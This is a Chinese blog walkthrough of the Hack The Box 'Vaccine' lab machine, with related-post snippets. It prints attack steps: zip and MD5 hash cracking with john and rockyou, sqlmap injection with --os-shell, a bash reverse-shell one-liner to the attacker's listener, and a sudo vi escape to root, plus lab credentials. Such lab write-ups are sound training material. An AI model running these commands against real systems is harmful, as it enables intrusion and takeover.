HackTheBox-Vaccine

最新推荐文章于 2023-11-14 17:33:34 发布
最新推荐文章于 2023-11-14 17:33:34 发布
阅读量542 收藏
点赞数
分类专栏: # Hack The Box 文章标签: 渗透测试 Hack The Box
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/119143281
版权

HackTheBox-Vaccine

连接配置

参考之前写的连接配置,文章链接

信息搜集

使用nmap对场景给出的ip地址进行扫描

nmap -sS -A 10.10.10.46

在这里插入图片描述

发现其开放了21、22和80端口,利用上一场景得到的FTP用户凭据 ftpuser/mc@F1l3ZilL4,尝试登陆FTP服务

登录FTP

ftp 10.10.10.46
Name:ftpuser
Password:mc@F1l3ZilL4

在这里插入图片描述

登陆后利用 dir命令列出所有的文件,发现存在 backup.zip 压缩包,利用 get命令下载下来

在这里插入图片描述

发现下载下来的 backup.zip 是加密的,尝试利用 Kali 中的 john 来破解压缩包密码

破解压缩包密码

首先生成压缩包的hash值

zip2john backup.zip > hash

利用 Kali 中自带的字典 rockyou.txt,将 rockyou.txt.gz 复制到桌面上并用 gzip解压缩

在这里插入图片描述

使用 john来指定字典破解密码

john hash --fork=4 -w rockyou.txt 2>/dev/null
--fork=4:4个进程
-w:指定字典路径
2>/dev/null:将错误输出到黑洞(不显示)

John破解得到压缩包密码:741852963

在这里插入图片描述

利用 unzip解压 backup.zip得到 index.php 以及 style.css

在这里插入图片描述

获取登录密码

查看 index.php 发现存在 admin账户以及其密码的MD5值

在这里插入图片描述

利用网站在线破解一下这串hash值,网站链接,得到密码为:qwerty789

在这里插入图片描述

登录网站

利用 admin/qwerty789 登录网站

在这里插入图片描述

查看一下网站发现处于右上角的搜索框之外并没有什么利用点,在搜索框随便输入点内容,利用burp suite抓个包将内容保存下来

在这里插入图片描述

利用sqlmap进行测试

sqlmap -r Vaccine.txt

在这里插入图片描述

发现确实存在注入点,并且后台数据库为PostgreSQL

在这里插入图片描述

getshell

由于是sql注入点,采用 --os-shell 来getshell

在这里插入图片描述

先起一个监听

nc -nvvlp 1234

然后在 os-shell 中输入 bash -c 'bash -i >& /dev/tcp/10.10.16.53/1234 0>&1' 来反弹shell

在这里插入图片描述

升级shell

将升级 shell 升级为 tty,得到一个交互式的shell

在这里插入图片描述

查找文件发现/var/www/html目录下的dashboard.php存在当前用户postgres的密码P@s5w0rd!

在这里插入图片描述

提权

验证用户密码查看自己当前的权限

sudo -l

在这里插入图片描述

发现用户被允许编辑配置文件 /etc/postgresql/11/main/pg_hba.conf,可以利用vi并验证密码提权至root
进入vi界面后可能会界面重叠,直接输入:!/bin/bash再点击回车即可,输入whoami发现已经成功提权为root

在这里插入图片描述

进入/root目录下,查看 root.txt 文件,即可拿到SYSTEM OWN的Flag

在这里插入图片描述

H3rmesk1t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试练习靶场hackthebox——Starting Point Vaccine攻略(内附各种bug解决方案)
TF0xn的博客
09-22 1984
目录连接配置扫描登录FTP破解压缩包密码登录网站SQL注入getshell(附bug解决办法)升级shell提权 连接配置 见这篇文章开始部分,在此不再赘述 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -T4 -F 10.10.10.28 -T4:针对TCP端口禁止动态扫描延迟超过10ms -F:快速扫描,扫描一些常用端口 发现其开放了21、22和80端口,接下来我们用上一节最后部分获取到的ftp用户凭据ftpuser/mc@F1l3ZilL4登录ftp服务 登录FTP ftp 10.10
HackTheBox - Vaccine
qq_45862635的博客
06-17 921
Hack The Box :: Starting Point - Tier2 - Vaccine
Hack the box vaccine
qq_41696858的博客
07-03 219
上一台靶机的线索FTP账号 ftpuser/mc@F1l3ZilL4 1.日常nmap -sC -sV 10.10.10.46,开放21,22,80端口 2.结合上一台靶机拿到的FTP账号,密码,登录FTP服务器,dir看到backup.zip,拿到备份文件 3.解密,用kali里面的john 先用zip2john backup.zip>hash //生成hash值,解密效率更高 john hash --fork=4 -w /usr/share/wordlists/rockyou.txt 2&gt
hack the box vaccine 靶场练习
鸥鹭忘机
08-01 1792
收集信息 连接hack the box服务器后第一步依然是扫描靶机。 nmap -sV -sS -F 10.10.10.46 -sV 代表扫描端口和开放的服务信息 -sS 代表用TCP半开式扫描 -F 快速扫描,扫描常用的端口 发现开放了80,21等端口。我们用上一个靶机获取到的账号和密码来连接一下这个ftp服务器,并查看一下有哪一些文件。 ftp 10.10.10.46 //然后更具提示输入账号和密码 ls 发现了一个backup.zip,把它下载下来并解压。 如果被防火墙拦截则可以开启被
hack the box靶场Vaccine靶机
zr1213159840的博客
03-23 3220
开启,看第一题: 问:除了跑了ssh和http服务,还有什么服务? 回答:ftp,使用nmap扫描,能看到结果 nmap -sV -Pn 10.129.95.174 第二个问题: 问:有一个服务时可以匿名登录的,用户名是什么? 回答:anonymous。下意识猜测是ftp服务可以匿名登录,直接在文件管理中使用ftp登录,看到以下结果,然后可以登录,确信是anonymous 并且其中包含一个backup.zip文件,直接下载下来,肯定和后面的题目相关。 说曹操曹操到,第三问 问:可以下载的文件
Hack The Box : Starting Point - Vaccine
qq_60201815的博客
09-13 668
攻击机:kali-linux 靶机:Oopsie --------------------------------------------------------------------------------------------------------------------------------- 网络配置:操作与Archetype靶机相同,链接:Hack The Box : Starting Point - Archetype_丶 Chave的博客-CSDN博客 渗透过程 已知目标
nyc-vaccine-scraper
02-17
【nyc-vaccine-scraper】是一个使用JavaScript编写的程序,主要功能是针对纽约市的疫苗接种信息进行网络抓取和处理。在这个项目中,开发者利用Web Scraping技术从指定的网页上获取疫苗相关的实时数据,如疫苗库存、...
clean-vaccine
03-07
从压缩包文件名“clean-vaccine-master”来看,这可能代表项目的主分支,通常是开发的主要分支。在Git中,"master"分支是默认的,包含了最新的稳定代码。开发者通常会从这个分支创建新特性或修复bug的分支,然后合并...
NJ-Vaccine-TweetBot
03-10
【标题】"NJ-Vaccine-TweetBot" 是一个基于Python编程语言开发的项目,它主要用于自动发布关于新泽西州疫苗接种信息的推特。这个项目可能是为了帮助公众获取及时、准确的疫苗接种数据,提高公共卫生信息的传播效率。...
covid-vaccine-modeling
03-12
标题 "covid-vaccine-modeling" 暗示了这是一个关于使用Python进行COVID-19疫苗接种模拟的项目。在当前全球大流行的背景下,疫苗接种模型对于理解和预测疫苗接种策略的效果至关重要。这样的模型可以帮助政策制定者...
The Anti-Vaxxer Vaccine-crx插件
04-03
语言:English (United States) 抗vaxxer疫苗是第一个数字疫苗,旨在在线对抗抗缅婆婆婆的传播。 抗vaxxerism几乎只有疫苗。 但它从未像今天那样毒力和危险,导致疫苗接种率下降,疾病爆发和死亡。...
Hack The Box 之 10 Vaccine
Angelxiqi的博客
05-07 485
一如既往的详细,给个好评呗~~
HackTheBox-Starting Point--Tier 2---Vaccine
七天
11-14 193
输出显示 postgres用户权限下,可以使用sudo权限编辑pg_hba.conf文件。2.FTP允许匿名登录,发现backup.zip。6.访问80端口,admin:qwerty789登录。7.搜索接口使用$searc变量,尝试对其进行注入。4.编辑pg_hba.conf获取shell。3.使用john解密backup.zip。4.backup.zip文件信息泄漏。爆破hash密码,得到密码是。,查看index.php,发现。参数获取一个shell。8.获取反弹shell。
0x03-HackTheBox-Shield
0pr
04-22 528
Shield Video Walkthrough!???? 个人博客地址 Via今天回来继续 HackTheBox 系列。有事耽误了两天。前两天发现 Vaccine 这个机器老是会出现网络问题,我就跳过不做了。那么今天就是 Shield。 目标机器在IP地址 10.10.10.29。 Recon Nmap 只有 80 和 3306 端口开着,一个网站,加一个 mysql server。 攻击者可以继...
【HTB WP】Vaccine
Pz_mstr's Blog
02-23 704
前言 Hack the box - Vaccine WP 原文用onenote写的,懒得搬运了,凑合看吧 这几天试了一下HTB,感觉挺好玩的,属于是kail熟悉练习了 小知识记录 这次用到了zip2john、john和sudo -l,记录一下 zip2john 这东西原理是啥?有源代码的,不过懒得看了,作用是提取加密压缩包哈希信息 john 提取到压缩包哈希信息后,使用 sudo john passwd.hash 进行爆破(应该是有个内置密码本) sudo -l 即sudo --list 可以列出当前用户
Hack The Box -----------------------Active
大方子
12-16 6917
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
渗透测试练习靶场hackthebox——Starting Point Archetype攻略
TF0xn的博客
09-15 3028
目录连接配置扫描测试445端口连接数据库获取RCE 连接配置 选择EU或USA后,点击上方Download Connection Pack,下载xxxxx.ovpn,在命令行内键入:openvpn xxxxx.ovpn 如图所示,就连接成功了 扫描 根据网站提示,我们需要扫描10.10.10.27,使用nmap进行扫描:nmap -sC -sV 10.10.10.27 -sC:使用默认脚本进行扫描,等同于–script=default -sV:探测开启的端口来获取服务、版本信息 可以发现,目标开启
靶机渗透_hackthebox__haystack -4
qq_34717555的博客
11-11 1305
获得靶机IP 10.10.10.115 nmap 扫一下 nmap -A IP 得到三个开放端口 Nmap scan report for bogon (10.10.10.115) Host is up (0.28s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open s...
【Matlab仿真】资源useless,don‘t download
最新发布
07-12
【Matlab仿真】资源useless,don‘t download
foreach ($list as $key => &$row) { $row->visible(['id', 'do_time', 'sheep_list', 'factory', 'remark', 'farms', 'animal', 'vaccine']); $row->getRelation('farms')->visible(['id', 'name']); $row->getRelation('animal')->visible(['tag_code', 'short_code']); $row->getRelation('vaccine')->visible(['id', 'vaccine_id', 'name']); $row['vaccine']['name'] = Db::name("farm_vaccine") ->where('id', $row['vaccine']['vaccine_id']) ->value("name"); }解析
06-09
这是一段 PHP 代码,其作用是对一个列表进行遍历并做一些处理。具体来说,对于每一个列表中的元素,将其可见的属性设置为 id、do_time、sheep_list、factory、remark、farms、animal 和 vaccine,同时对于 farms、animal 和 vaccine 这三个关联模型,也设置其可见的属性。在接下来的代码中,还将 vaccine 的 name 属性替换为从 farm_vaccine 表中查找对应 vaccine_id 后得到的 name 值。 需要注意的是,代码中使用了 PHP 中的引用符 &,这意味着在对 $row 进行修改时,实际上是修改了原列表中对应元素的值,而不是 $row 的拷贝。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值